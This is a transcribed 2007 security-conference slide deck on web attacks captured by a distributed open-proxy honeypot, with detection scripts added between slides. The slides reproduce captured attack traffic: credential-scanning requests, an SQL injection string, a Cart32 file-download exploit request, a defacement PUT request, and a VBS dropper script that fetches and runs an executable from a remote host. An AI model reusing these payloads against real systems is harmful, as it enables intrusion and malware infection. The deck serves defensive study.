OWASP AppSec 2004 Presentation


WASC Distributed Open Proxy Honeypot Project: Phase 2
Update on Attacks and Vulnerabilities

OWASP & WASC AppSec 2007 Conference, San Jose, Nov 2007
http://www.webappsec.org/

Ryan Barnett, WASC Officer
Director of Application Security Training, Breach Security
[email protected]

Copyright 2007 - The OWASP Foundation
Permission is granted to copy, distribute and/or modify this document under the terms of the Creative Commons Attribution-ShareAlike 2.5 License. To view this license, visit http://creativecommons.org/licenses/by-sa/2.5/
The OWASP Foundation, http://www.owasp.org/

Introduction
Ryan Barnett: Director of Application Security Training at Breach Security.
Background as a web server administrator.
Author of Preventing Web Attacks with Apache (Addison-Wesley, 2006).
Open Source and Community projects:
Board Member, Web Application Security Consortium.
Project Leader, WASC Distributed Open Proxy Honeypot Project.
Community Manager, ModSecurity.
Instructor for the SANS Institute.
Project Leader, Center for Internet Security's Apache Benchmark.

Distributed Open Proxy Honeypot Project
Problem: lack of real web attack log data.
Goal: to identify/block/report on current web attacks.
Method: instead of functioning as the target of web attacks, we run as a conduit for the attacks by operating as an open proxy server.
Tools used: ModSecurity 2.x, the Core Rules and the ModSecurity Management Appliance.
http://www.webappsec.org/projects/honeypots

Why an Open Proxy?
There is a lack of perceived value in just deploying a default Apache install: we would most likely only get hit by worms and automated programs scanning IP addresses.
Bad guys use them: we know that the bad guys use open proxies to loop their attacks through to hide their source IP.
We need to function as a real open proxy and only block known malicious attacks. Bad guys will test our systems prior to using them for their attacks. If we don't work as a real open proxy, they will identify this from the initial probe and then not use our systems.

Typical Initial Testing
(image-only slide)

What are we reporting?
We are presenting real, live web attack data captured in the wild. None of the attack data is simulated or created in labs.
Data is taken directly from the WASC Distributed Open Proxy Honeypot Project and is identified by ModSecurity honeypot sensors.
We are focusing on individual attacks rather than statistics and trends; this is an area for improvement.

Why are we reporting this data?
To raise public awareness about real attacks.
To support Web Attack Metrics by providing concrete examples of the types of web attacks that are being carried out on the web.
Oftentimes there are debates as to the real threat of complex attacks that are presented to the community by whitehats: are these really the attacks that are being used to compromise sites?

Phase 1: Active Project Sensors
We had a total of 7 active sensor participants in the following geographic locations: Moscow, Russia; Crete, Greece; Karlsruhe, Germany; San Francisco, CA USA; Norfolk, VA USA; Falls Church, VA USA; Foley, AL USA.
They were deployed for four months (January to April 2007).

Phase 2: New Active Sensors
After Phase 1 ended (May 2007), we had several more participants sign up. We now have a total of 14 sensors, in the following additional locations: Cluj-Napoca, Romania; Annapolis, MD USA; Nürnberg, Germany; Chicago, IL USA; Brussels, Belgium; Buenos Aires, Argentina.
They have been deployed since mid-October 2007.

Active Contributors
Ivan Ristic, Brian Rectanus, Ofer Shezaf, Robert Auger, Sergey Gordeychik, Spiros Antonatos, Bjoern Weiland, Kurt Grutzmacher, Pete LeMay, Rick Nall, Jeremiah Grossman, Peter Guerra, Jehiah Czebotar, Shaun Vlassis, Román Medina-Heigl Hernández, Peednas Dhamija, Erwin Geirnaert, Sebastian Garcia, Bogdan Calin

Project Architecture
[Diagram elements: Attacker; Inbound Attack for Target Site; WASC Honeypot Sensor (ModSecurity inspects the HTTP payload and identifies it as an attack; Honeypot sends 200 status code); sample payload: Script%23%.asp 1=1/../../ Session ID=UX8serwderakvcx Hacker.exe123; Central Logging Host (ModSecurity Management Appliance); WASC Analyst; Target Site.]

Central Console Dashboard
(image-only slide)

Management Console Alert Viewer
Optionally update the Alert Viewer to group events by Source IP Address or Alert Severity.

Management Console Transaction Search
(image-only slide)

Additional Custom Honeypot Rules
Deny known offenders: run an RBL check and block IPs.
Track Brute Force Attacks: create IP-based persistent collections, track authentication failures and block the client if they exceed the threshold.
Track SessionIDs: create session-based persistent collections. This data can be used to do session reconstruction or potentially identify session hijacking.
Identify any credit card usage.

ModSecurity Audit Logging and Traffic Categorization
All honeypot traffic falls in one of three categories:
Normal - web surfing.
Abnormal but not malicious - odd protocol manipulation by poorly written clients/spiders, load balancing by web servers and proprietary applications.
Malicious - recon, intrusion attempts and worms.
We are logging all transactions, not just those that trigger a rule. How else can we identify new attacks or successful evasions?
The majority of traffic (~3/4) did not trigger a ModSecurity rule. What was this traffic? Was it an attack? Was it benign? As we move forward in phase 2, we will be focusing more on this type of data analysis.

High-Level Statistics, October 2007
Total number of transactions: 8,988,361 (number of individual transaction entries that we received)
Total number of alerts: 2,133,677 (number of individual alerts that triggered from one of our protection rulesets)
Total unique clients: 46,513 (number of remote IP addresses that directly connected to our honeypots)
Total number of clients looping through other proxy servers: 61,846 (number of unique IP addresses that were identified in X-Forwarded-For request headers)
Total unique targets: 171,688 (number of destination websites)

Top Trends
Banner-Ad/Click Fraud generated the most traffic: ~2,625,522 requests (click, banner and ad words in the URL).
SPAMMERS are the #2 users of open proxy servers: HTTP CONNECT method requests to have the proxy connect directly to remote SMTP hosts, and automated programs to post their SPAM messages to user forums, etc.
The majority of web attacks are automated. This increases the need for anti-automation defenses.
Information leakage is a huge problem: too many websites are configured to provide verbose error messages to clients.
Attackers are looking for easy targets: pick a vulnerability -> find a site, instead of pick a site -> find a vulnerability.
Attackers are utilizing proxy chaining. This makes source tracebacks extremely difficult.

Top 5 ModSecurity Attack Categories
[Bar chart "Traffic Details", y-axis 0 to 1,000,000 requests; categories: Missing Request Headers, CONNECT Request, Numeric Host Header, UTF8 Encoding Abuse, Client Denied by RBL Check]

Top Attacks Identified by the Honeypot Rules
Rule Message (# of Requests)
Request Missing a Host Header (575,928)
CONNECT Request (415,103)
Request Missing a User Agent Header (277,566)
Request Missing an Accept Header (130,314)
Host header is a numeric IP address (93,579)
UTF8 Encoding Abuse Attack Attempt (11,275)
Client Denied by RBL Check (3,184)
Client Denied Due to Excessive Basic Authentication Failures (2,792)
Request Indicates an automated program explored the site (2,613)
URL Encoding Abuse Attack Attempt (530)
SQL Injection Attack. (499)
Google robot activity (404)
example robot activity (345)
IIS Information Leakage (343)
HTTP Response Splitting Attack. Matched signature <%0d> (282)
SQL Information Leakage (264)
URL file extension is restricted by policy (241)
Visa Credit Card Number sent from site to user (109)
Request Indicates a Security Scanner Scanned the Site (107)
PHP source code leakage (107)
Request Body Parsing Failed. Multipart: Final boundary missing. (99)
Cross-site Scripting (XSS) Attack. (94)
System Command Injection. (90)

WASC Web Security Threat Classification: Attacks and Vulnerabilities Identified
1 Authentication
1.1 Brute Force
1.2 Insufficient Authentication
1.3 Credential/Session Prediction
2 Authorization
2.1 Insufficient Authorization
2.2 Insufficient Session Expiration
2.3 Session Fixation
3 Client-side Attacks
3.1 Content Spoofing
3.2 Cross-site Scripting/Malicious Code Injection
4 Command Execution
4.5 SQL Injection
5 Information Disclosure
5.2 Information Leakage
6 Logical Attacks
5.2 Insufficient Anti-Automation

Brute Force Attack
A Brute Force attack is an automated process of trial and error used to guess a person's username, password, credit-card number or cryptographic key.
We will discuss the following attacks:
HEAD Method Scanning
Brute Forcing Porn Sites
GET Method Logins Scanning
Distributed Reverse Brute Force Scans against example

HEAD Request Method Scanning
The request uses HEAD to increase the speed of responses (as the web server does not have to send back the response body).
The request includes the Authorization header with the base64 encoded credentials.
The goal is to look for an HTTP Response Status Code of something other than 401 (most often a 200 or 302).

GET Method Logins
This authentication method passes user credentials on the URL line as arguments instead of using Authorization or Cookie headers.
This type of authentication is considered less secure, as the login data can be easily captured in standard log file formats (thus increasing disclosure).

Reverse Brute Force Scan
The attacker is cycling through different usernames and then repeating the same target password of "james":
GET http://www.example.com/login?.patner=sbc&login=mc_check&passwd=james&.save=1 HTTP/1.0
GET http://www.example2.com/login?.patner=sbc&login=mcgolden&passwd=james&.save=1 HTTP/1.0
GET http://www.example3.com/login?.patner=sbc&login=mc_bob&passwd=james&.save=1 HTTP/1.0
GET http://www.example4.com/login?.patner=sbc&login=mc_bill&passwd=james&.save=1 HTTP/1.0
GET http://www.example5.com/login?.patner=sbc&login=mcnumber&passwd=james&.save=1 HTTP/1.0
GET http://www.example6.com/login?.patner=sbc&login=mc_energy&passwd=james&.save=1 HTTP/1.0

Distributed Scanning
The attacker is distributing the scan across multiple example domains. This may help to reduce the likelihood of identification of the attacks and/or may not cause account lockouts.
GET http://www.example.com/login?.patner=sbc&login=mc_check&passwd=james&.save=1 HTTP/1.0
GET http://www.example2.com/login?.patner=sbc&login=mcgolden&passwd=james&.save=1 HTTP/1.0
GET http://www.example3.com/login?.patner=sbc&login=mc_bob&passwd=james&.save=1 HTTP/1.0
GET http://www.example4.com/login?.patner=sbc&login=mc_bill&passwd=james&.save=1 HTTP/1.0
GET http://www.example5.com/login?.patner=sbc&login=mcnumber&passwd=james&.save=1 HTTP/1.0
GET http://www.example6.com/login?.patner=sbc&login=mc_energy&passwd=james&.save=1 HTTP/1.0

Identifying Correct Credentials
Failed authentication produces a 200 status code; the HTML text includes "Invalid ID or password."
Correct authentication produces a 302 status code; the HTML text includes "Improve performance."

Distributed Scanning Part 2
Same distributed reverse scanning concept, but targeting a different authentication application, in this example the verify_user application. The response data is easier to parse (next slide).
GET http://xxx.xxx.xxx.238/verify_user?l=kevinduffy99&p=mischa HTTP/1.0
GET http://xxx.xxx.xxx.34/verify_user?l=keziboy&p=mischa HTTP/1.0
GET http://xxx.xxx.xxx.85/verify_user?l=dowfla&p=mischa HTTP/1.0
GET http://xxx.xxx.xxx.114/verify_user?l=nomofoyo13&p=mischa HTTP/1.0
GET http://xxx.xxx.xxx.223/verify_user?l=corruptu_2000&p=mischa HTTP/1.0
GET http://xxx.xxx.xxx.28/verify_user?l=krdewey01&p=mischa HTTP/1.0
GET http://xxx.xxx.xxx.114/verify_user?l=nomofoyo13&p=mischa HTTP/1.0
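The reverse and distributed scans above defeat per-account lockouts because each username is tried only once; the detection has to key on the password instead. The following is an added example of that analysis over proxy request records (constructed here, not the honeypot project's code); the parameter names, thresholds and sample addresses are assumptions.

```python
"""Flag reverse and distributed brute-force login scans in proxy request records.

Added example for the Reverse Brute Force Scan and Distributed Scanning
slides; it is not code from the honeypot project. Records are constructed
"<client-ip> <method> <url>" lines modelled on the GET-method logins shown
on those slides; parameter names and thresholds are assumptions.
"""
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

USER_PARAMS = ("login", "l", "user", "username")   # names seen on the slides plus two common ones
PASS_PARAMS = ("passwd", "p", "password", "pass")
MIN_USERNAMES = 5   # one password tried against at least this many distinct users
MIN_HOSTS = 3       # spread over at least this many target hosts counts as distributed


def extract_credentials(url):
    """Return (target host, username, password) from a GET-method login URL, or None.

    Credentials on the URL line are exactly what ends up in ordinary access logs,
    which is why the slides call this login style less secure.
    """
    parts = urlsplit(url)
    qs = parse_qs(parts.query)
    user = next((qs[k][0] for k in USER_PARAMS if k in qs), None)
    password = next((qs[k][0] for k in PASS_PARAMS if k in qs), None)
    if user is None or password is None:
        return None
    return parts.hostname, user, password


def find_reverse_brute_force(records):
    """Group login attempts by password; flag passwords reused across many usernames.

    Returns {password: {"users": set, "hosts": set, "clients": set, "distributed": bool}}.
    Per-account lockout never fires on this pattern because each username is tried
    only once, so the password, not the account, is the right grouping key.
    """
    by_password = defaultdict(lambda: {"users": set(), "hosts": set(), "clients": set()})
    for record in records:
        fields = record.split()
        if len(fields) < 3 or fields[1] != "GET":
            continue   # malformed line or not a GET login: skip, never crash the analysis
        creds = extract_credentials(fields[2])
        if creds is None:
            continue
        host, user, password = creds
        entry = by_password[password]
        entry["users"].add(user)
        entry["hosts"].add(host)
        entry["clients"].add(fields[0])
    return {
        pw: dict(entry, distributed=len(entry["hosts"]) >= MIN_HOSTS)
        for pw, entry in by_password.items()
        if len(entry["users"]) >= MIN_USERNAMES
    }


# Constructed sample traffic: one proxy client cycling the fixed password "james"
# over six usernames and six example domains, two verify_user probes with the
# password "mischa", and one ordinary login from a different client.
SAMPLE_RECORDS = [
    "203.0.113.7 GET http://www.example.com/login?.patner=sbc&login=mc_check&passwd=james&.save=1",
    "203.0.113.7 GET http://www.example2.com/login?.patner=sbc&login=mcgolden&passwd=james&.save=1",
    "203.0.113.7 GET http://www.example3.com/login?.patner=sbc&login=mc_bob&passwd=james&.save=1",
    "203.0.113.7 GET http://www.example4.com/login?.patner=sbc&login=mc_bill&passwd=james&.save=1",
    "203.0.113.7 GET http://www.example5.com/login?.patner=sbc&login=mcnumber&passwd=james&.save=1",
    "203.0.113.7 GET http://www.example6.com/login?.patner=sbc&login=mc_energy&passwd=james&.save=1",
    "203.0.113.7 GET http://203.0.113.238/verify_user?l=kevinduffy99&p=mischa",
    "203.0.113.7 GET http://203.0.113.34/verify_user?l=keziboy&p=mischa",
    "198.51.100.9 GET http://www.example.com/login?login=alice&passwd=correct-horse-staple&.save=1",
]

if __name__ == "__main__":
    for pw, f in find_reverse_brute_force(SAMPLE_RECORDS).items():
        print(f"password {pw!r}: {len(f['users'])} users, {len(f['hosts'])} hosts, distributed={f['distributed']}")
```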

Account Enumeration
SPAMMERs can use this technique to enumerate valid example accounts, to send SPAM to or to try and hijack accounts.
Failed username: ERROR:102:Invalid Login
Failed password: ERROR:101:Invalid Password
Correct authentication: OK:0:username
Attackers successfully enumerated 2 accounts:
OK:0:skaterman6
OK:0:[email protected]

Insufficient Authentication
Insufficient Authentication occurs when a web site permits an attacker to access sensitive content or functionality without having to properly authenticate.
Example: accessing an admin function by passing the username in the URL. Clients do not need to log in or submit authorization cookies.
GET http://www.example.com/english/book/book.php?page=781&block=776&admin=0 HTTP/1.0
--CUT--

Credential/Session Prediction
Credential/Session Prediction is a method of hijacking or impersonating a web site user. The common attack sequence is:
1. The attacker connects to the web application, acquiring the current session ID.
2. The attacker calculates or brute forces the next session ID.
3. The attacker switches the current value in the cookie/hidden form field/URL and assumes the identity of the next user.

No Encryption/Clear-Text Cookie Data
These are examples of session/cookie data sent from applications to clients. Since there is no encryption or hashing of the data, attackers can easily alter the data (such as incrementing/decrementing the digits) to attempt to take over another user's session.
Set-Cookie: guestID=413;
Set-Cookie: CurrentSessionCookie=212035755652;
Set-Cookie: CFID=3937042;expires=Thu,
Set-Cookie: Referer=/gate/gb/www.example.com/;Path=/
Set-Cookie: mgUser=1|76ab0352df45407e8033a4faf5d7b0be|64.5.128.103|1192250622159|1; Domain=.example.com; Expires=Mon, 12-Nov-2007 04

Insufficient Entropy
These cookie values are not random enough to prevent guessing attacks. The first 9 digits are the same, with only the last 3 incrementing almost sequentially.
Set-Cookie: CurrentSessionCookie=212035755652;
Set-Cookie: CurrentSessionCookie=212035755660;
Set-Cookie: CurrentSessionCookie=212035755669;
Set-Cookie: CurrentSessionCookie=212035755700;

Insufficient Encryption
Unfortunately, sensitive data is often passed within the cookie header data and it is not sufficiently protected with strong encryption. Fake or weak protection is often used, such as Base64 encoding:
Set-Cookie: cpg132_data=YTozOntzOjI6IklEIjtzOjMyOiI0YTA4YTQwNjNiZjM2ZTc2NjAwMjE2NDRkMDE3NjdjZiI7czoyOiJhbSI7aToxO3M6NDoibmFtZSI7czo0OiJBbm9uIjt9
The same cookie, Base64 decoded:
Set-Cookie: cpg132_data=a:3:{s:2:"ID";s:32:"4a08a4063bf36e7660021644d01767cf";s:2:"am";i:1;s:4:"name";s:4:"Anon";}

Insufficient Authorization
Insufficient Authorization is when a web site permits access to sensitive content or functionality that should require increased access control restrictions.
The cookie in the previous example contained a valid session ID hash and then a username; however, poorly written applications often do not make a connection between the valid session ID and the username. What happens if an attacker alters portions of the cookie value and changes the username?
Set-Cookie: cpg132_data=a:3:{s:2:"ID";s:32:"4a08a4063bf36e7660021644d01767cf";s:2:"am";i:1;s:4:"name";s:5:"Admin";}

Insufficient Authorization: Web Defacements
HTTP PUT method:
--6aa02c14-B--
PUT http://www.example.com/scorpion.txt HTTP/1.0
Accept-Language: pt-br, en-us;q=0.5
Translate: f
Content-Length: 36
User-Agent: Microsoft Data Access Internet Publishing Provider DAV 1.1
Host: www.example.com
Pragma: no-cache
--6aa02c14-C--
1923Turk CyberscorpioN ownz your box

Insufficient Session Expiration
Insufficient Session Expiration is when a web site permits an attacker to reuse old session credentials or session IDs for authorization.
No expiration date/time specified:
Set-Cookie: phpbb2mysql_sid=9ff3b118fbbf63e088c99d09d810e311; path=/; domain=d M Y, G.i
Expiration date/time is too long:
Set-Cookie: cpvr=3cc2d13f-1b27-4c11-a277-b3cb77bf33e3; domain=example.com; expires=Sun, 16-Jan-2107 12:27:36 GMT; path=/

Insufficient Session Expiration Continued
It is also important to note that proper session expiration means expiring, invalidating or deleting the session ID in BOTH the web browser and the web application.
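The cookie weaknesses collected on the preceding slides (clear-text numeric IDs, near-sequential values, Base64 standing in for encryption, missing or century-long expiry, browser-only deletion) can be checked mechanically. The following audit is an added example, not code from the honeypot project; its thresholds, fixed clock and sample headers are assumptions, and it goes one step beyond the slides by also reporting missing HttpOnly and Secure attributes.

```python
"""Audit Set-Cookie headers for the weaknesses shown on the preceding slides.

Added example, not code from the honeypot project. Thresholds and the fixed
"current time" are assumptions chosen to make the output reproducible.
"""
import base64
import re
from datetime import datetime, timezone

MAX_LIFETIME_DAYS = 30      # assumed policy: anything longer is "too long"
MAX_SEQUENTIAL_GAP = 100    # assumed: consecutive IDs closer than this are guessable
NOW = datetime(2007, 11, 1, tzinfo=timezone.utc)   # fixed clock for the example
EXPIRES_FORMATS = ("%a, %d-%b-%Y %H:%M:%S %Z", "%a, %d %b %Y %H:%M:%S %Z")


def parse_set_cookie(header):
    """Split a Set-Cookie value into (name, value, {attribute: value})."""
    first, *attrs = [p.strip() for p in header.split(";")]
    name, _, value = first.partition("=")
    attributes = {}
    for attr in attrs:
        if attr:
            k, _, v = attr.partition("=")
            attributes[k.strip().lower()] = v.strip()
    return name.strip(), value, attributes


def parse_expires(text):
    """Parse the two Expires date styles seen on the slides; None if neither fits."""
    for fmt in EXPIRES_FORMATS:
        try:
            return datetime.strptime(text, fmt).replace(tzinfo=timezone.utc)
        except ValueError:
            continue
    return None


def looks_base64_serialized(value):
    """True if the value Base64-decodes to printable text shaped like PHP serialize() output."""
    try:
        decoded = base64.b64decode(value, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return False
    return decoded.isprintable() and re.match(r"[aOs]:\d+:", decoded) is not None


def audit_cookie(header, now=NOW):
    """Return the list of findings for one Set-Cookie header."""
    _name, value, attrs = parse_set_cookie(header)
    findings = []
    if value.isdigit():
        findings.append("clear-text numeric identifier")
    if looks_base64_serialized(value):
        findings.append("Base64-encoded serialized data (encoding is not encryption)")
    if "expires" not in attrs and "max-age" not in attrs:
        findings.append("no expiration specified")
    elif "expires" in attrs:
        exp = parse_expires(attrs["expires"])
        if exp is None:
            findings.append("unparseable Expires attribute")
        elif exp <= now:   # deletion cookie: the server must invalidate the session too
            findings.append("expired: clears the browser copy only; the application must also invalidate it")
        elif (exp - now).days > MAX_LIFETIME_DAYS:
            findings.append(f"expiration too far in the future ({(exp - now).days} days)")
    if "httponly" not in attrs:
        findings.append("missing HttpOnly")
    if "secure" not in attrs:
        findings.append("missing Secure")
    return findings


def sequential_values(headers):
    """True if numeric values of one cookie across responses step up by small gaps."""
    values = [int(parse_set_cookie(h)[1]) for h in headers if parse_set_cookie(h)[1].isdigit()]
    gaps = [b - a for a, b in zip(values, values[1:])]
    return bool(gaps) and all(0 < g < MAX_SEQUENTIAL_GAP for g in gaps)


# Constructed samples modelled on the slides.
PHP_SERIALIZED = b'a:3:{s:2:"ID";s:32:"4a08a4063bf36e7660021644d01767cf";s:2:"am";i:1;s:4:"name";s:4:"Anon";}'
BASE64_SAMPLE = base64.b64encode(PHP_SERIALIZED).decode()
SEQUENTIAL_SAMPLE = [f"CurrentSessionCookie={v};" for v in (212035755652, 212035755660, 212035755669, 212035755700)]
SAMPLE_HEADERS = [
    "guestID=413;",
    "cpg132_data=" + BASE64_SAMPLE,
    "phpbb2mysql_sid=9ff3b118fbbf63e088c99d09d810e311; path=/; domain=d M Y, G.i",
    "cpvr=3cc2d13f-1b27-4c11-a277-b3cb77bf33e3; domain=example.com; expires=Sun, 16-Jan-2107 12:27:36 GMT; path=/",
    "ASP.NET_SessionId=prqc4d2slpwo3c45yixtbo55; path=/; HttpOnly",
]

if __name__ == "__main__":
    for h in SAMPLE_HEADERS:
        print(h.split(";")[0], "->", audit_cookie(h) or ["ok"])
    print("CurrentSessionCookie predictable:", sequential_values(SEQUENTIAL_SAMPLE))
```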

Poorly written web applications only attempt to expire or delete the cookie from the web browser:
Set-Cookie: T=z=0; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; domain=.example.com
Remember, you do not own the browser! These cookies can potentially be sent back to the web application. Will they let the user back in???

Other Cookie Issues
Minimal use of HttpOnly and Secure cookie protections.
HttpOnly helps to prevent cookies from being read by client-side scripting:
Set-Cookie: ASP.NET_SessionId=prqc4d2slpwo3c45yixtbo55; path=/; HttpOnly
Secure will ensure that the cookie is only sent to an SSL-enabled site:
Set-Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; expires=Wed, 16-Jan-2008 19:59:57 GMT; path=/; secure

Session Fixation
Session Fixation is an attack technique that forces a user's session ID to an explicit value. While we did not see direct evidence of Session Fixation, we did see web applications that allowed session ID information to be passed on the URL, which makes a session fixation attack easier to execute by including these web links within emails sent to target victims:
POST http://www.example.com/joinSubmitAction.do;jsessionid=DF4B9604ED1467DFECD4BDA7452E23D9 HTTP/1.1
POST http://www.example.com/account/login.php;sessionid=6d0e2a51c515cb5b877bae03972a0a78 HTTP/1.1

Content Spoofing
Content Spoofing is an attack technique used to trick a user into believing that certain content appearing on a web site is legitimate and not from an external source.
We ran into an interesting blog defacement. It uses JavaScript in the following manner: it opens an alert box, then opens a document.window to display an alternative page from a remote site.

URL Decoded Javascript
[Image-only slide; only the closing fragments of the decoded script ('")); //-->') survived extraction.]

bicho.htm: Attempted VBS Malware Install
tf = fso.CreateTextFile(cSystemDir + "runit.vbs", true);
//tf = fso.CreateTextFile("c:\\runit.vbs", true);
tf.WriteLine("On Error Resume Next");
tf.WriteLine("URL = \"http://rzone.com.ar/xD.exe\"");
tf.WriteLine("Set xml = CreateObject(\"Microsoft.XMLHTTP\")");
tf.WriteLine("xml.Open \"GET\", URL, False");
tf.WriteLine("xml.Send");
tf.WriteLine("set oStream = createobject(\"Adodb.Stream\")");
tf.WriteLine("oStream.type = 1");
tf.WriteLine("oStream.open");
tf.WriteLine("oStream.write xml.responseBody");
tf.WriteLine("oStream.savetofile \"" + cSystemDir + "xD.exe\", 1");
tf.WriteLine("oStream.close");
tf.WriteLine("set oStream = nothing");
tf.WriteLine("Set xml = Nothing");
tf.WriteLine("Set oShell = createobject(\"WScript.Shell\")");
tf.WriteLine("oShell.run \"" + cSystemDir + "xD.exe\", 1, false");
tf.Close();
objShell.run("\"" + cSystemDir + "runit.vbs\"");

Embed.htm: Attempted ActiveX Malware Install
(image-only slide)

More Javascript Malware Injections: A Serious Problem
There are many websites that are injecting malicious JavaScript into legitimate webpages. The JavaScript may be injected either by remote attackers or by the website owner themselves.
Beware of what site you visit. We recommend using sandboxed browsers as throw-away sessions: VMware images, or applications such as Sandboxie (http://www.sandboxie.com/).

Honeypot Example: Client visits ProxyChecker site
POST http://www.example.com/boyter/CheckProxy.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Host: www.example.com
Content-Length: 21

seed=9D3BFF73E33871B5

ProxyChecker Response
HTTP/1.1 200 OK
Notice: Subject to Monitoring
X-Powered-By: PHP/5.2.0
Content-Type: text/html
Via: 1.0 debian.localdomain
Content-Length: 4080
Connection: close

Hmm, looks like there should be more data???
hash=9D3BFF73E33871B5
REMOTE_ADDR=70.187.221.243
HTTP_VIA=1.0 debian.localdomain
HTTP_X_FORWARDED_FOR=

Here Comes the Javascript!
(image-only slide)

Sandbox Testing the Javascript
I decided to test out executing the JavaScript to see what it would do. I used Sandboxie and Burp Proxy to intercept/manipulate/record the JavaScript. Here we go...

Redirect to a new site
GET /html/ HTTP/1.1
Host: www.example.com.cee4f2730c07001bdf06d6a5.update1.classictel.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://www.example.com/js.html

HTTP/1.1 302 Found
Date: Mon, 08 Oct 2007 21:28:45 GMT
Server: Apache/2.2.4 (Fedora)
X-Powered-By: PHP/5.1.6
Location: http://bibi32.org/505/Xp/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

MS Windows Media Player 10 Plugin Overflow Exploit (MS06-006)
(image-only slide)

Cross-site Scripting
Cross-site Scripting (XSS) is an attack technique that forces a web site to echo attacker-supplied executable code, which loads in a user's browser.
All inbound XSS alert messages were triggered by either SPAMMERS sending their HTML posts to various message boards, or poor HTML that accidentally added JavaScript to links.

SQL Injection
SQL Injection is an attack technique used to exploit web sites that construct SQL statements from user-supplied input.
GET http://www.example.com/app.aspx?pid=6246'%20and%20char(124)%2Buser%2Bchar(124)=0%20and%20'%25'=' HTTP/1.1
User-Agent: Internet Explorer 6.0
Host: www.example.com
Cookie: ASP.NET_SessionId=zidkywu4rcfegi554fmc3c2q

Cart32 GetImage Arbitrary File Download Exploit Attempt
Description: Cart32 is a web-based content manager. The application is exposed to an arbitrary file download issue because it fails to sufficiently sanitize user-supplied input to the "ImageName" parameter of the "GetImage" script. Cart32 version 6.3 is affected.
Ref: http://www.securityfocus.com/bid/25928
Exploit example:
GET //cgi-bin/c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf HTTP/1.1
The attacker sent similar probes for other common directory locations for the Cart32 application:
//scripts/c32web.exe/GetImage
//cgi/c32web.exe/GetImage
//Cart32/c32web.exe/GetImage

Information Leakage
Information Leakage is when a web site reveals sensitive data, such as developer comments or error messages, which may aid an attacker in exploiting the system.
As the previous section on SQL Injection showed, presenting verbose error messages to clients can not only provide attackers with information to aid in future attacks, but the messages can also be the actual transport for extracted information.
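Outbound inspection is the defensive counterpart of the leakage observations above: the honeypot rules listed earlier (SQL Information Leakage, PHP source code leakage, IIS Information Leakage, Visa Credit Card Number sent from site to user) fire on response content. The scanner below is an added example of that idea, not code from the project or from ModSecurity; its signature set and sample responses are constructed assumptions.

```python
"""Scan HTTP responses for the information leakage classes named in this deck.

Added example for the Information Leakage slide; not code from the honeypot
project or ModSecurity. The signature set is a small hand-picked assumption
modelled on the rule messages listed earlier in the deck.
"""
import re

LEAK_PATTERNS = {
    "SQL Information Leakage": re.compile(
        r"Syntax error converting the \w+ value|Unclosed quotation mark|"
        r"You have an error in your SQL syntax|ORA-\d{5}|\[Microsoft\]\[ODBC", re.I),
    "PHP source code leakage": re.compile(r"<\?php\b"),
    "IIS Information Leakage": re.compile(r"Server Error in '/[^']*' Application|Microsoft-IIS/\d"),
}
# 16-digit Visa PAN beginning with 4; digit groups optionally separated by one space or dash.
VISA_RE = re.compile(r"\b4\d{3}([ -]?)\d{4}\1\d{4}\1\d{4}\b")


def luhn_ok(number):
    """Luhn checksum, which separates real card numbers from random 16-digit strings."""
    digits = [int(c) for c in number if c.isdigit()]
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:            # double every second digit from the right
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def scan_response(headers, body):
    """Return the list of leakage findings for one response (headers dict plus body text)."""
    text = "\n".join(f"{k}: {v}" for k, v in headers.items()) + "\n" + body
    findings = []
    server = headers.get("Server", "")
    if re.search(r"/\d", server):     # "Apache/2.2.4" style version banner
        findings.append(f"version disclosure in Server header: {server}")
    for message, pattern in LEAK_PATTERNS.items():
        if pattern.search(text):
            findings.append(message)
    if any(luhn_ok(m.group(0)) for m in VISA_RE.finditer(body)):
        findings.append("Visa Credit Card Number sent from site to user")
    return findings


# Constructed sample responses. The SQL error text is the generic SQL Server
# conversion error; as the slides note, such a verbose message is itself the
# transport for the value the database was made to echo (here between the pipes).
SAMPLE_RESPONSES = {
    "sql_error": ({"Server": "Microsoft-IIS/5.0", "Content-Type": "text/html"},
                  "Microsoft OLE DB Provider for ODBC Drivers error '80040e07'<br>"
                  "[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting "
                  "the nvarchar value '|dbo|' to a column of data type int."),
    "php_source": ({"Server": "Apache"}, "<?php $db_pass = 'constructed-example'; ?>"),
    "card": ({"Server": "Apache/2.2.4 (Fedora)"}, "Order confirmed. Card on file: 4111 1111 1111 1111"),
    "benign": ({"Server": "Apache"}, "<html><body>Welcome back.</body></html>"),
}

if __name__ == "__main__":
    for label, (headers, body) in SAMPLE_RESPONSES.items():
        print(f"{label}: {scan_response(headers, body) or ['clean']}")
```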

Example Detailed Error Message
(image-only slide)

Reveals Version Information
(image-only slide)

Insufficient Anti-Automation
Insufficient Anti-automation is when a web site permits an attacker to automate a process that should only be performed manually.
Certain web site functionalities should be protected against automated attacks: account registrations, blog/forum postings.

The Poor Man's CAPTCHA
Response details:
HTTP/1.1 401 Unauthorized
WWW-Authenticate: Basic realm="Username : nospam - Password : iamnotspam"
Content-Length: 401
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from webgate
X-Cache-Lookup: MISS from webgate:80
Via: 1.0 www.testproxy.net
Notice: Subject to Monitoring
Connection: close

Lessons Learned (1)
Web attacks are running rampant: automation.
Attackers are extremely bold, mainly due to their anonymity from hiding behind numerous open proxy servers.
